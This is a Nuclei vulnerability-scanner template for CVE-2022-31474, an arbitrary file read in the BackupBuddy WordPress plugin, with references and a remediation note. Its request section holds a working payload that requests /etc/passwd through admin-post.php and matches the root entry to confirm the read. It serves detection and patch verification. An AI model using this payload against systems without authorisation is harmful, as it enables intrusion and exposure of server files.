nuclei-templates/cves/2022/CVE-2022-31474.yaml

31 lines
1.0 KiB
YAML

id: CVE-2022-31474
info:
name: BackupBuddy Arbitrary File Read
author: aringo
severity: high
description: BackupBuddy versions 8.5.8.0 through 8.7.4.1 are vulnerable to arbitrary file read
reference:
- https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/
- https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy
- https://ithemes.com/backupbuddy/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474
remediation: Developers should immediately upgrade to at least version 8.7.5 or higher
tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200